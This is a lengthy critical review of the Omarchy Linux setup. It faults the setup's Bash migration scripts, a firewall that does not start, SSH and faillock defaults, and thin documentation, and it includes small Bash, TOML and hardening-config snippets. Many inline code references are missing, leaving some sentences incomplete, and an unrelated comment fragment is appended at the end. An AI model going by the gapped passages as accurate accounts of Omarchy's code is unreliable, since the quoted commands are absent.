Instead, it’s a shell script that launches a full-screen Alacritty window to display a CPU-intensive ASCII animation. While Omarchy does use hyprlock , its timeout is set longer than that of the screensaver. Because you can’t dismiss the screensaver with your mouse (only with your keyboard) it might give inexperienced users a false sense of security. This is yet another example of prioritizing gimmicky animations over actual functionality and, to some degree, security. Like the browser and the terminal emulator, the default shell configuration is a pretty basic B….ash , and useful extensions like Starship are barely configured. For example, I ed into a boilerplate Python project directory, activated its venv , and expected Starship to display some useful information, like the virtual environment name or the Python version. However, none of these details appeared in my prompt. “Surely if I do the same in a Ruby on Rails project, Starship will show me some useful info!” I thought, and ed into a Rails boilerplate project. Nope. In fact… Omarchy doesn’t come with Rails pre-installed. I assume Hansson ’s target audience doesn’t primarily consist of Rails developers, despite the unconditional , but let’s not get ahead of ourselves. It is nevertheless puzzling that Omarchy doesn’t come with at least Ruby pre-installed. I find it a bit odd that the person who literally built the most successful Ruby framework on earth is pre-installing “Apps” like HEY , Spotify , and X , but not his own FOSS creation or even just the Ruby interpreter. If you want Rails , you have to navigate through the menu to “Install” , then “Development” , and finally select “Ruby on Rails” to make RoR available on your system. Not just Ruby , though. And even going the extra mile to do so still won’t make Starship display any additional useful info when inside a Rails project folder.
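Assuming the shipped Starship configuration leaves these modules off or overrides their format (I haven’t inspected the exact file, so treat this as a sketch), turning the missing context back on is a documented per-module option:

```toml
# Hypothetical ~/.config/starship.toml fragment; `disabled` is a
# standard per-module option in Starship's configuration schema.
[python]
disabled = false   # show interpreter version and active virtualenv

[ruby]
disabled = false   # show the Ruby version inside e.g. a Rails project
```

Two lines per module — hardly the kind of deep customization you’d expect an “opinionated” setup to skip.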
PS: The script that installs these development tools bypasses the system’s default package manager and repository, opting instead to use mise to install interpreters and compilers. This is yet another example of security not being taken quite as seriously as it should be. At the very least, the script should inform the user that this is about to happen and offer the option to use the package manager instead, if the distributed version meets the user’s needs. Fun fact: At the time of writing, mise installed Ruby 3.4.7. The latest package available through the package manager is – you guessed it – 3.4.7. As mentioned earlier, Omarchy is built entirely using Bash scripts, and there’s nothing inherently wrong with that. When done correctly and kept at a sane limit, Bash scripts are powerful and relatively easy to maintain. However, the scripts in Omarchy are unfortunately riddled with little oversights that can cause issues. Those scripts are also used in places in which a proper software implementation would have made more sense. Take the theme scripts, for example. If you go ahead and create a new theme under and name it , and then run a couple of times until the tool hits your new theme, you can see one effect of these oversights. Nothing catastrophic happened, except now won’t work anymore. If you’d want to annoy an unsuspecting Omarchy user, you could do this: While this is such a tiny detail to complain about, it is an equally low-hanging fruit to write scripts in a way in which this won’t happen. Apart from the numerous places where globbing and word splitting can occur, there are other instances of code that could have also been written a little bit more elegantly. Take this line , for example: To drop and from the , you don’t have to call and pipe to . 
Instead, you can simply use Bash’s built-in regex matching to do so: Similarly, in this line there’s no need to test for a successful exit code with a dedicated check, when you can simply make the call from within the condition: And frankly, I have no idea what this line is supposed to be: What are you doing, Hansson? Are you alright? Don’t make the mistake of believing that the remarks made above are the only issues with Hansson ’s scripts in Omarchy . While these specific examples are nitpicks, they paint a picture that only gets less colorful the more we look into the details. We can continue to gauge the quality of the scripts by looking beyond just syntax. Take, for example, the migration : This script runs five commands in sequence within an condition: first , followed by two invocations, then again, and finally . While this might work as expected “on a sunny day” , the first command could fail for various reasons. If it does, the subsequent commands may encounter issues that the script doesn’t account for, and the outcome of this migration will be different from what the author anticipated. For experienced users, the impact in such a case may be minimal, but for others, it may present a more significant hurdle. Furthermore, as can be seen here , the invoking process cannot detect if only one of the five commands failed. As a result, the entire migration might be marked as skipped , despite changes being made to the system. But we’ll look more closely at the migrations in just a moment. The real concern here, however, is the widespread absence of exception handling, either through status code checks for previously executed commands or via dependent executions (e.g., ). In most scripts, there is no validation to ensure that actions have the desired effect and that the current state actually represents the desired outcome.
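To illustrate the two idioms in general terms — the actual Omarchy lines aren’t reproduced here, so the path values below are invented:

```shell
path="/usr/local/bin:/home/user/.cargo/bin:/usr/bin"

# Instead of `echo "$path" | grep ... | sed ...`, Bash's built-in
# regex matching plus parameter expansion can drop an entry in-process:
if [[ $path =~ (^|:)/home/user/\.cargo/bin(:|$) ]]; then
  path=${path//\/home\/user\/.cargo\/bin:/}
fi
echo "$path"   # /usr/local/bin:/usr/bin

# And instead of `some_command; if [ $? -eq 0 ]; then ...`,
# run the command directly inside the condition:
if grep -q '/usr/bin' <<<"$path"; then
  echo "ok"
fi
```

Both forms avoid spawning extra processes and make the control flow explicit, which is exactly the kind of low-hanging fruit the surrounding critique is about.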
Almost all sequentially executed commands depend upon one another, yet the author doesn’t make sure that if fails the script won’t just blindly run . Note: Although sets , which would cause a script like the one presented above to fail when the first command fails, the migrations are invoked by sourcing the script. This script, in turn, invokes the script using the helper function . However, this function executes the script in the following way: In this case, the options are not inherited by the actual migration , meaning it won’t stop immediately when an error occurs. This behavior makes sense, as abruptly stopping the installation would leave the system in an undefined state. But even if we ignored that and assumed that migrations would stop when the first command failed, it still wouldn’t actually handle the exception, but merely stop the following commands from performing actions on an unexpected state. To understand the broader issue and its impact on security, we need to dive deeper into the system’s functioning, and especially into migrations . This helps illustrate how the fragile nature of Omarchy could take a dangerous turn, especially considering the lack of tests, let alone any dedicated testing infrastructure. Let’s start by adding some context and examining how configurations are applied in Omarchy . Inspired by his work as a web developer, Hansson has attempted to bring concepts from his web projects into the scripts that shape his Linux setup. In Omarchy , configuration changes are handled through migration scripts, as we just saw, which are in principle similar to the database migrations you might recall from Rails projects. However, unlike SQL or the Ruby DSL used in Active Record Migrations , these Bash scripts do not merely contain a structured query language; they execute actual system commands during installation. More importantly: they are not idempotent by default!
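A minimal sketch of the non-idempotence problem, with an invented config key — run once, the migration behaves; run twice, it silently duplicates its change:

```shell
conf=$(mktemp)
printf 'MaxAuthTries 3\n' > "$conf"

# Hypothetical append-style migration, as described above: it neither
# checks the current state nor removes a previous value first.
migrate() { echo 'MaxAuthTries 10' >> "$conf"; }

migrate
migrate   # re-running (e.g. after a partially failed install) appends again

grep -c 'MaxAuthTries' "$conf"   # 3 -- one original line plus two copies
```

A database migration framework refuses to apply the same migration twice; a plain Bash function has no such guard unless the author writes one.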
While the idea of migrations isn’t inherently problematic, in this case, it can (and has) introduce(d) issues that go/went unnoticed by the Omarchy maintainers for extended periods, but more on that in a second. The migration files in Omarchy are a collection of ambiguously named scripts, each containing a set of changes to the system. These changes aren’t confined to specific configuration files or components. They can be entirely arbitrary, depending on what the migration is attempting to implement at the time it is written. To modify a configuration file, these migrations typically rely on the command. For instance, the first migration intended to change from to might execute something like . The then following one would have to account for the previous change: . Another common approach involves removing a specific line with and appending the new settings via . However, since multiple migrations are executed sequentially, often touching the same files and running the same commands, determining the final state of a configuration file can become a tedious process. There is no clear indication of which migration modifies which file, nor any specific keywords (e.g., ) to grep for and help identify the relevant migration(s) when searching through the code. Moreover, because migrations rely on fixed paths and vary in their commands, it’s impossible to test them against mock files/folders, to predict their outcome. These scripts can invoke anything from sourcing other scripts to running commands, with no restrictions on what they can or cannot do. There’s no “framework” or API within which these scripts operate. To understand what I mean by that, let’s take a quick look at a fairly widely used pile of scripts that is of similar importance to a system’s functionality: OpenRC . 
While the init.d scripts in OpenRC are also just that, namely scripts, they follow a relatively well-defined API : Note: I’m not claiming that OpenRC ’s implementation is flawless or the ultimate solution, far from it. However, given the current state of the Omarchy project, it’s fair to say that OpenRC is significantly better within its existing constraints. Omarchy , however, does not use any sort of API for that matter. Instead, scripts can basically do whatever they want, in whichever way they deem adequate. Without such well-defined interfaces , it is hard to understand the effects that migrations will have, especially when changes to individual services are split across a number of different migration scripts. Here’s a fun challenge: Try to figure out how your folder looks after installation by only inspecting the migration files. To make matters worse, other scripts (outside the migration folder) may also modify configurations that were previously altered by migrations , at runtime, such as . Note: To the disappointment of every NixOS user, unlike database migrations in Rails , the migrations in Omarchy don’t support rollbacks and, judging by their current structure, are unlikely to do so moving forward. The only chance Omarchy users have in case a migration should ever brick their existing system is to make use of the available snapshots . All of this (the lack of interfaces , the missing exception handling and checks for desired outcomes, the overlapping modifications, etc.) creates a chaotic environment that is hard to overview and maintain, which can severely compromise system integrity and, by extension, security. Want an example? On my fresh installation, I wanted to validate the following claim from the manual : Firewall is enabled by default: All incoming traffic by default except for port 22 for ssh and port 53317 for LocalSend.
We even lock down Docker access using the ufw-docker setup to prevent that your containers are accidentally exposed to the world. What I discovered upon closer inspection, however, is that Omarchy ’s firewall doesn’t actually run, despite its pre-configured ruleset . Yes, you read that right: everyone installing the v3.0.2 ISO (and presumably earlier versions) of Omarchy is left with a system that doesn’t block any of the ports that individual software might open during runtime. Please bear in mind that apart from the full-disk encryption, the firewall is the only security measure that Omarchy puts in place. And it’s off by default. Only once I manually enabled and started it using / did it activate the rules mentioned in the handbook. As highlighted in the original issue , it appears that, amid the chaos that is the migration- , preflight- and first-run- scripts, no one ever realized that you need to tell to explicitly enable a service for it to actually run. And because it’s all made up of Bash scripts that can do whatever they want, you cannot easily test these things to notice that the expected state for a specific service was never reached. Unlike in Rails , where you can initialize your (test) database and run each migration manually if necessary to make sure that the schema reaches the desired state and that the database is seeded correctly, this agglomeration of Bash scripts is not structured data. Hence, applying the same principle to something as arbitrary as a Bash script is not as easily possible, at least not without clearly defined structures and interfaces . As a user who trusted Omarchy to secure their installation, I would be upset, to say the least. The system failed to keep users safe, and more importantly, nobody noticed for a long time. There was no hotfix ISO issued, nor even a heads-up to existing users alongside the implemented fix ( e.g. ). While mistakes happen, simply brushing them under the rug feels like rather negligent behavior.
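For context, with ufw a written ruleset and a running firewall are two separate things. A sketch of what the installer would have needed (this requires root, so it’s shown as a recipe rather than a runnable example):

```
ufw allow 22/tcp                      # the rules from the handbook...
ufw allow 53317
ufw enable                            # ...do nothing until the firewall is enabled,
systemctl enable --now ufw.service    # and told to come up at every boot
```

Omitting either of the last two steps leaves exactly the situation described above: a ruleset on disk and an inert firewall.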
Looking ahead, the mess that is the Bash scripts certainly won’t decrease in complexity, making me doubt that things like this won’t happen again. Note: The firewall fix was listed in v2.1.1. However, on my installation of v3.0.2 the firewall would still not come up automatically. I double-checked this by running the installation of v3.0.2 twice, and both times the firewall would not autostart after the second reboot. While writing this post, v3.1.0 ( update: v3.1.1 ) was released and I also checked the issue there. v3.1.0 appears to have finally fixed the firewall issue. That said, it shows how much of a mess the whole system is when things that were identified and supposedly fixed multiple versions ago still don’t work in newer releases weeks later. Tl;dr: v3.1.0 appears to be the first release to actually fix the firewall issue, even though it was identified and presumably fixed in v2.1.1, according to the changelog. With the firewall active, it becomes apparent that Omarchy ’s configuration does indeed leave port 22 (SSH) open, even though the SSH daemon is not running by default. While I couldn’t find a clear explanation for why this port is left open on a desktop system without an active SSH server, my assumption is that it’s intended to allow the user to remotely access their workstation should they ever need to. It’s important to note that the file in Omarchy , like many other system files, remains unchanged. Users might reasonably assume that, since Omarchy intentionally leaves the SSH port open, it must have also configured the SSH server with sensible defaults. Unfortunately, this is not the case. In a typical Arch installation, users would eventually come across the “Protection” section on the OpenSSH wiki page, where they would learn about the crucial settings that should be adjusted for security reasons.
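The settings in question are the usual suspects from OpenSSH hardening guides. A hypothetical excerpt of what sensible sshd_config defaults could look like (these are common recommendations, not Omarchy’s actual values):

```
PermitRootLogin no
PasswordAuthentication no
KbdInteractiveAuthentication no
AuthenticationMethods publickey
MaxAuthTries 3
```

Five lines, all documented in sshd_config(5) — exactly the kind of opinion an opinionated setup that leaves port 22 open should be shipping.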
However, when using a system like Omarchy , which is marketed as an opinionated setup that takes security seriously , users might expect these considerations to be handled for them, making it all the more troubling that no sensible configuration is in place, despite the deliberate decision to leave the SSH port open for future use. Hansson seemingly struggles to get even basics like right. The fact that there’s so little oversight, that users are allowed to set weak passwords for both their account and drive encryption, and that the only other security measure put in place, the firewall, simply hasn’t been working, does not speak in favor of Omarchy . Info: is an abstraction layer that simplifies managing the powerful / firewall; it stands for “uncomplicated firewall”. Going into this review I wasn’t expecting a hardened Linux installation with SELinux , intrusion detection mechanisms, and all these things. But Hansson is repeatedly addressing users of Windows and macOS (operating systems with working firewalls and notably more security measures in place) who are frustrated with their OS as a target audience. At this point, however, Omarchy is a significantly worse option for those users. Not only does Omarchy give a hard pass on Linux Security Modules , linux-hardened , musl , hardened_malloc , or tools like OpenSnitch , and fails to properly address security-related topics like SSH, GPG or maybe even AGE and AGE/Yubikey , but it in fact weakens the system’s security with changes like the increase of and login password retries and the decrease of faillock timeouts . Omarchy appears to be undoing security measures that were put in place by the software- and the Arch developers, while the basis it uses for building the system does not appear to be reliable enough to protect its users from future mishaps.
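For comparison, a stock faillock policy looks roughly like this. A hypothetical /etc/security/faillock.conf excerpt with upstream-style values — the opposite direction of the loosening described above:

```
deny = 3             # lock the account after three consecutive failures
unlock_time = 600    # keep it locked for ten minutes
fail_interval = 900  # count failures within a 15-minute window
```

Raising `deny` and shrinking the lockout, as Omarchy reportedly does, makes online brute-forcing of that weak login password strictly easier.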
Then there is the big picture of Omarchy that Hansson tries to curate, which is that of a TUI-centered, hacker -esque desktop that promises productivity and so on. He even goes as far as calling it “a pro system” . However, as we clearly see from the implementation, configuration and the project’s approach to security, this is unlike anything you would expect from a pro system . The entire image of a TUI-centered productivity environment is further contradicted in many different places, primarily by the lack of opinions and configuration . If the focus is supposed to be on “pro” usage, and especially the command-line, then… The configuration doesn’t live up to its sales pitch, and there are many aspects that either don’t make sense or aren’t truly opinionated , meaning they’re no different from a standard Arch Linux installation. In fact, I would go as far as to say that Omarchy is barely a ready-to-use system at all out of the box and requires a lot of in-depth configuration of the underlying Arch distribution for it to become actually useful. Let’s look at only a few details. There are some fairly basic things you’ll miss on the “lightweight” 15GB installation of Omarchy : With the attention Omarchy is receiving, particularly from Framework (Computer Inc.) , it is surprising that there is no option to install the system on RAID1 hardware: I would argue that RAID1 is a fairly common use case, especially with Framework (Computer Inc.) 16" laptops, which support a secondary storage device. Considering that Omarchy is positioning itself to compete against e.g. macOS with TimeMachine , yet it does not include an automated off-drive backup solution for user data by default – which by the way is just another notable shortcoming we could discuss – and given that configuring a RAID1 root with encryption is notoriously tedious on Linux, even for advanced users, the absence of this option is especially disappointing for the intended audience. 
Even more so when neither the installer nor the post-installation process provides any means to utilize the additional storage device, leaving inexperienced users seemingly stuck with the command. Omarchy does not come with a dedicated swap partition, leaving me even more puzzled about its use of 15GB of disk space. I won’t talk through why having a dedicated swap partition that is ideally encrypted using the same mechanisms already in place is a good idea. This topic has been thoroughly discussed and written about countless times. However, if you, like seemingly the Omarchy author, are unfamiliar with the benefits of having swap on Linux, I highly recommend reading this insightful write-up to get a better understanding. What I will note, however, is that the current configuration does not appear to support hibernation via the command through the use of a dynamic swap file . This leads me to believe that hibernation may not function on Omarchy . Given the ongoing battery drain issues, especially with Framework (Computer Inc.) laptops while in suspend mode, it’s clear that hibernation is an essential feature for many Linux laptop users. Additionally, it’s hard to believe that Hansson , a former Apple evangelist , wouldn’t be accustomed to the simple act of closing the lid on his laptop and expecting it to enter a light sleep mode, and eventually transitioning into deep sleep to preserve battery life. If he had ever used Omarchy day-to-day on a laptop in the same way most people use their MacBooks , he would almost certainly have noticed the absence of these features. This further reinforces the impression that Omarchy is a project designed to appear robust at first glance, but reveals a surprisingly hollow foundation upon closer inspection. Let’s keep our focus on laptop use. We’ve seen Hansson showcasing his Framework (Computer Inc.) laptop on camera, so it’s reasonable to assume he’s using Omarchy on a laptop.
It’s also safe to say that many users who might genuinely want to try Omarchy will likely do so on a laptop as well. That said, as we’ve established before, closing the laptop lid doesn’t seem to trigger hibernate mode in Omarchy . But if you close the lid and slip the laptop into your backpack, surely it would activate some power-saving measures, right? At the very least, it should blank the screen, switch the CPU governor to powersaving , or perhaps even initiate suspend to RAM ? Well… Of course, I can’t test these scenarios firsthand, as I’m evaluating Omarchy within a securely confined virtual machine, where any unintended consequences are contained. Still, based on the system’s configuration, or more accurately the lack thereof, it seems unlikely that an Omarchy laptop will behave as expected. The system might switch power profiles due to the power-profiles-daemon when not plugged in, yet its functionality is not comparable to a properly configured or similar. It seems improbable that it will enter suspend to RAM or hibernate mode, and it’s doubtful any other power-saving measures (like temporarily halting non-essential background processes) will be employed to conserve battery life. Although the configuration comes with an “app” for mail, namely HEY , that platform does not support standard mail protocols . I don’t think it’s a hot take to say that probably 99% of Omarchy ’s potential users will need to work with an email system that does support IMAP and SMTP, however. Yet, the base system offers zero tools for that. I’m not even asking for anything “fancy” like ; Omarchy unfortunately doesn’t even come with the most basic tools like the command out of the box. Whether you want to send email through your provider, get a simple summary for a scheduled Cron job delivered to your local mailbox, or just debug some mail-related issue, the command is relatively essential, even on a desktop system, but it is nowhere to be found on Omarchy . 
Speaking of which: Cron jobs? Not a thing on Omarchy . Want to automate backing up some files to remote storage? Get ready to dive into the wonderful world of timers , where you’ll spend hours figuring out where to create the necessary files, what they need to contain, and how to activate them. Omarchy could’ve easily included a Cron daemon or at least for the sake of convenience. But I guess this is a pro system , and if the user needs periodic jobs, they will have to figure out . Omarchy is, after all, -based … … and that’s why it makes perfect sense for it to use rootless Podman containers instead of Docker. That way, users can take advantage of quadlets and all the glorious integration. Unfortunately, Omarchy doesn’t actually use Podman . It uses plain ol’ Docker instead. Like most things in Omarchy , power monitoring and alerting are handled through a script , which is executed every 30 seconds via a timer. That’s your crash course on timers right there, Omarchy users! This script queries and then uses to parse the battery percentage and state. It’s almost comical how hacky the implementation is. Given that the system is already using UPower , which transmits power data via D-Bus , there’s a much cleaner and more efficient way to handle things. You could simply use a piece of software that connects to D-Bus to continuously monitor the power info UPower sends. Since it’s already dealing with D-Bus , it can also send a desktop notification directly to whatever notification service you’re using (like in Omarchy ’s case). No need for , , or a periodic Bash script triggered by a timer. “But where could I possibly find such a piece of software?” , you might ask. Worry not, Hr. Hansson , I have just the thing you need ! That said, I can understand that you, Hr. 
Hansson , might be somewhat reluctant to place your trust in software created by someone who is actively delving into the intricacies of your project, rather than merely offering a superficial YouTube interview to casually navigate the Hyprland UI for half an hour. Of course, Hr. Hansson , you could have always taken the initiative to develop a more robust solution yourself, in a proper, lower-level language, and neatly integrated it into your Omarchy repository. But we will explore why this likely hasn’t been a priority for you, Hr. Hansson , in just a moment. While the author’s previous attempt at a developer setup still came with Zellij , this time his opinions seemingly changed and Omarchy doesn’t include Zellij , or Tmux or even screen anymore. And nope, picocom isn’t there either, so good luck reading that Arduino output from . That moment, when you realize that you’ve spent hours figuring out timers , only to find out that you can’t actually back up those files to remote storage because there’s no , let alone or . At least there is the command. :-) Unfortunately not, but Omarchy comes with and by default. I could go on and on, and scavenge through the rest of the unconfigured system and the scripts, like for example the one, where Omarchy once again seems to prefer -ing random scripts from the internet (or anyone man-in-the-middle -ing it) rather than using the system package manager to install Tailscale . But, for the sake of both your sanity and mine, I’ll stop here. As we’ve seen, Omarchy is more unconfigured than it is opinionated . Can you simply install all the missing bits and pieces and configure them yourself? Sure! But then what is the point of this supposed “perfect developer setup” or “pro system” to begin with? In terms of the “opinionated” buzzword, most actual opinions I’ve come across so far are mainly about colors, themes, and security measures.
I won’t dare to judge the former two, but as for the latter, well, unfortunately they’re the wrong opinions . In terms of implementation: Omarchy is just scripts, scripts, and more scripts, with no proper structure or (CI) tests. BTW: A quick shout out to your favorite tech influencer , who probably has at least one video reviewing the Omarchy project without mentioning anything along these lines. It is unfortunate that these influential people barely scratch the surface on a topic like this, and it is even more saddening that recording a 30 minute video of someone clicking around on a UI seemingly counts as a legitimate “review” these days. The primary focus for many of these people is seemingly on pumping out content and generating hype for views and attention rather than providing a thoughtful, thorough analysis. ( Alright, we’re almost there. Stick with me, we’re in the home stretch. ) The Omarchy manual : The ultimate repository of Omarchy wisdom, all packed into 33 pages, clocking in at little over 10,000 words. For context, this post on Omarchy alone is almost 10,000 words long. As is the case with the rest of the system, the documentation also adheres to Hansson ’s form over function approach. I’ve mentioned this before, but it bears repeating: Omarchy doesn’t offer any built-in for its scripts, let alone auto-completion, nor does it come with traditional pages. The documentation is tucked away in yet another SaaS product from Hansson ’s company ( Writebook ) and its focus is predominantly on themes, more themes, creating your own themes, and of course, the ever-evolving hotkeys. Beyond that, the manual mostly covers how to locate configuration files for individual UI components and offers guidance on how to configure Hyprland for a range of what feels like outrageously expensive peripherals. For the truly informative content, look no further than the shell function guide, with gems such as: : Format an entire disk with a single ext4 partition. Be careful! 
Wow, thanks, Professor Oak, I will be! :-) On a more serious note, though, the documentation leaves much to be desired, as evidenced by the user questions over on the GitHub discussions page . Take this question , which unintentionally sums up the Omarchy experience for probably many inexperienced users: I installed this from github without knowing what I was getting into (the page is very minimal for a project of this size, and I forgot there was a link in the footnotes). Please tell me there’s a way to remove Omarchy without wiping my entire computer. I lost my flashdrive, and don’t have a way to back up all my important files anymore. While this may seem comical on the surface, it’s a sad testament to how Omarchy appears to have a knack for luring in unsuspecting users with flashy visuals and so called “reviews” on YouTube, only to leave them stranded without adequate documentation. The only recourse? Relying on the solid Arch docs, which is an abrupt plunge into the deep end, given that Arch assumes you’re at least familiar with its very basics and that you know how you set up your own system. Maybe GitHub isn’t the most representative forum for the project’s support; I haven’t tried Discord, for example. But no matter where the community is, users should be able to fend for themselves with proper documentation, turning to others only as a last resort. It’s difficult to compile a list of things that could have made Omarchy a reasonable setup for people to consider, mainly because, in my opinion, the core of the setup – scripts doing things they shouldn’t or that should have been handled by other means (e.g., the package manager) – is fundamentally flawed. That said, I do think it’s worth mentioning a few improvements that, if implemented, could have made Omarchy a less bad option. Configuration files should not be altered through loose migration scripts. 
Instead, updated configuration files should be provided directly (ideally via packages, see below) and applied as patches using a mechanism similar to etc-update or dpkg . This approach ensures clarity and reduces confusion, preserves user modifications, and aligns with established best practices. Improve on the user experience where necessary and maybe even contribute improvements back. Use proper software implementations where appropriate. Want a fancy screensaver? Extend Hyprlock instead of awkwardly repurposing a fullscreen terminal window to mimic one. Need to display power status notifications without relying on GNOME or KDE components? Develop a lightweight solution that integrates cleanly with the desktop environment, or extend the existing Waybar battery widget to send notifications. Don’t like existing Linux “App Store” options? Build your own, rather than diverting a launcher from its intended use only to run Bash scripts that install packages from third-party sources on a system that has a perfectly good package manager in place. Arguably the most crucial improvement: Package the required software and install it via the system’s package manager. Avoid relying on brittle scripts, third-party tools like mise , or worse, piping scripts directly into . I understand that the author is coming from an operating system where it’s sort of fine to and use software like to manage individual Ruby versions. However, we have to take into consideration that macOS specifically has a significantly more advanced security architecture in place than (unfortunately) most out-of-the-box Linux installations have, let alone Omarchy . On Hansson’s setup the approach is neither sensible nor advisable, especially given that it’s ultimately a system that is built around a proper package manager. If you want multiple versions of Ruby, package them and use slotting (or the equivalent of it on the distribution that you’re using, e.g.
installation to version-specific directories on Arch ). Much of what the migrations and other scripts attempt to do could, and should, have been achieved through well-maintained packages and the proven mechanisms of a package manager. Whether it’s Gentoo , NixOS , or Ubuntu , each distribution operates in its own unique way, offering users a distinct set of tools and defaults. Yet, they all share one common trait: A set of strong, well-defined opinions that shape the system. Omarchy , in contrast, feels like little more than a glorified collection of Hyprland configurations atop an unopinionated, barebones foundation. If you’re going to have opinions, don’t limit them to just nice colors and cute little wallpapers. Form opinions on the tools that truly matter, on how those tools should be configured, and on the more intricate, challenging aspects of the system, not just the surface-level, easy choices. Have opinions on the really sticky and complicated stuff, like power-saving modes, redundant storage, critical system functionality, and security. Above all, cultivate reasonable opinions, ones that others can get behind, and build a system that reflects those. Comprehensive documentation is essential to help users understand how the system works. Currently, there’s no clear explanation for the myriad Bash scripts, nor is there any user-facing guidance on how global system updates affect individual configuration files. ( finally… ) Omarchy feels like a project created by a Linux newcomer, utterly captivated by all the cool things that Linux can do , but lacking the architectural knowledge to get the basics right, and the experience to give each tool a thoughtful review. Instead of carefully selecting software and ensuring that everything works as promised, the approach seems to be more about throwing everything that somehow looks cool into a pile.
There’s no attention to sensible defaults, no real quality control, and certainly no verification that the setup won’t end up causing harm or, at the very least, frustration for the user. The primary focus seems to be on creating a visually appealing but otherwise hollow product . Moreover, the entire Omarchy ecosystem is held together by often poorly written Bash scripts that lack any structure, let alone properly defined interfaces . Software packages are being installed via or similar mechanisms, rather than provided as properly packaged solutions via a package manager. Hansson is quick to label Omarchy a Linux distribution , yet he seems reluctant to engage with the foundational work that defines a true distribution: The development and proper packaging (“distribution”) of software . Whenever Hansson seeks a software (or software version) that is unavailable in the Arch package repositories, he bypasses the proper process of packaging it for the system. Instead, he resorts to running arbitrary scripts or tools that download the required software from third-party sources, rather than offering the desired versions through a more standardized package repository. Hansson also appears to avoid using lower-level programming languages to implement features in a more robust and maintainable manner at all costs , often opting instead for makeshift solutions, such as executing “hacky” Bash scripts through timers. A closer look at his GitHub profile and Basecamp’s repositories reveals that Hansson has seemingly worked exclusively with Ruby and JavaScript , with most contributions to more complex projects, like or , coming from other developers. This observation is not meant to diminish the author’s profession and accomplishments as a web developer, but it highlights the lack of experience in areas such as systems programming, which are crucial for the type of work required to build and maintain a proper Linux distribution. 
Speaking of packages, the system gobbles up 15GB of storage on a basic install, yet fails to deliver truly useful or high-quality software. It includes a hodgepodge of packages, like OpenJDK and websites of paid services in “App” -disguise, but lacks any real optimization for specific use cases. Despite Omarchy claiming to be opinionated most of the included software is left at its default settings, straight from the developers. Given Hansson ’s famously strong opinions on everything, it makes me wonder if the Omarchy author simply hasn’t yet gained the experience necessary to develop clear, informed stances on individual configurations. Moreover, his prioritization of his paid products like Basecamp and HEY over his own free software like Rails leaves a distinctly bitter aftertaste when considering Omarchy . What’s even more baffling is that seemingly no one at Framework (Computer Inc.) or Cloudflare appears to have properly vetted the project they’re directing attention (and sometimes financial support) to. I find it hard to believe that knowledgeable people at either company have looked at Omarchy and thought, “Out of all the Linux distributions out there, this barely configured stack of poorly written Bash scripts on top of Arch is clearly the best choice for us to support!” In fact, I would go as far as to call it a slap in the face to each and every proper distro maintainer and FOSS developer. Furthermore, I fail to see the supposed gap Omarchy is trying to fill. A fresh installation of Arch Linux, or any of its established derivatives like Manjaro , is by no means more complicated or time-consuming than Omarchy . In fact, it is Omarchy that complicates things further down the line, by including a number of unnecessary components and workarounds, especially when it comes to its chosen desktop environment. 
The moment an inexperienced user wants or needs to change anything, they’ll be confronted with a jumbled mess that’s difficult to understand and even harder to manage. If you want Arch but are too lazy to read through its fantastic Wiki , then look at Manjaro , it’ll take care of you. If that’s still not to your liking, maybe explore something completely different . On the other hand, if you’re just looking to tweak your existing desktop, check out other people’s dotfiles and dive into the unixporn communities for inspiration. As boring as Fedora Workstation or Ubuntu Desktop might sound, these are solid choices for anyone who doesn’t want to waste time endlessly configuring their OS and, more importantly, wants something that works right out of the box and actually keeps them safe. Fedora Workstation comes with SELinux enabled in “enforcing” mode by default, and Ubuntu Desktop utilizes AppArmor out of the box. Note: Yes, I hear you loud and clear, SuSE fans. The moment your favorite distro gets its things together with regard to the AppArmor-SELinux transition and actually enables SELinux in enforcing mode across all its different products and versions I will include it here as well. Omarchy is essentially an installation routine for someone else’s dotfiles slapped on top of an otherwise barebones Linux desktop. Although you could simply run its installation scripts on your existing, fully configured Arch system, it doesn’t seem to make much sense and it’s definitely not the author’s primary objective. If this was just Hansson’s personal laptop setup, nobody, including myself, would care about the oversights or eccentricities, but it is not. In fact, this project is clearly marketed to the broader, less experienced user base, with Hansson repeatedly misrepresenting Omarchy as being “for developers or anyone interested in a pro system” . 
I emphasize marketed here, because Hansson is using his reach and influence in every possible way to advertise and seemingly monetize Omarchy ; Apart from the corporate financial support, the project even has its own merch that people can spend money on. Given that numerous YouTubers have been heavily promoting the project over the past few weeks, often in the same breath with Framework (Computer Inc.) , it wouldn’t be surprising to see the company soon offering it as a pre-installation option on their hardware. If you’re serious about Linux, you’re unlikely to fall for the Omarchy sales pitch. However, if you’re an inexperienced user who’s heard about Omarchy from a tech-influencer raving about it, I strongly recommend starting your Linux journey elsewhere, with a distribution that actually prioritizes your security and system integrity, and is built and maintained by people who live and breathe systems, and especially Linux. Alright, that’s it. Why don’t any of the Bash scripts and functions provide a flag or maybe even autocompletions? Why are there no Omarchy -related pages? Why does the system come with GNOME Files , which requires several gvfs processes running in the background, yet it lacks basic command-line file managers like or ? Why would you define as an for unconditionally, but not install Rails by default? Why bother shipping tools like and but fail to provide aliases for , , etc to make use of these tools by default? Why wouldn’t you set up an O.G. alias like in your defaults ? Why ship the GNOME Calculator but not include any command-line calculators (e.g., , ), forcing users to rely on basics like ? Why ship the full suite of LibreOffice, but not a single useful terminal tool like , , , etc.? Why define functions like with and without an option to enable encryption, when the rest of the system uses and ? 
And if it’s intended for use by inexperienced users primarily for things like USB sticks, why not make it instead of so the drive works across most operating systems? Why not define actually useful functions like or / ? Why doesn’t your Bash configuration include history- and command-flag-based auto-suggestions? Or a terminal-independent vi mode ? Or at least more consistent Emacs-style shortcuts? Why don’t you include some quality-of-life tools like or some other command-line community favorites? If you had to squeeze in ChatGPT , why not have Crush available by default? Why does the base install with a single running Alacritty window occupy over 2.2GB of RAM right after booting? For comparison: My Gentoo system with a single instance of Ghostty ends up at around half of that. Why set up NeoVim but not define as an alias for , or even create a symlink? And speaking of NeoVim , why does the supposedly opinionated config make NeoVim feel slower than VSCode ?

mcyoung 1 month ago

Why SSA?

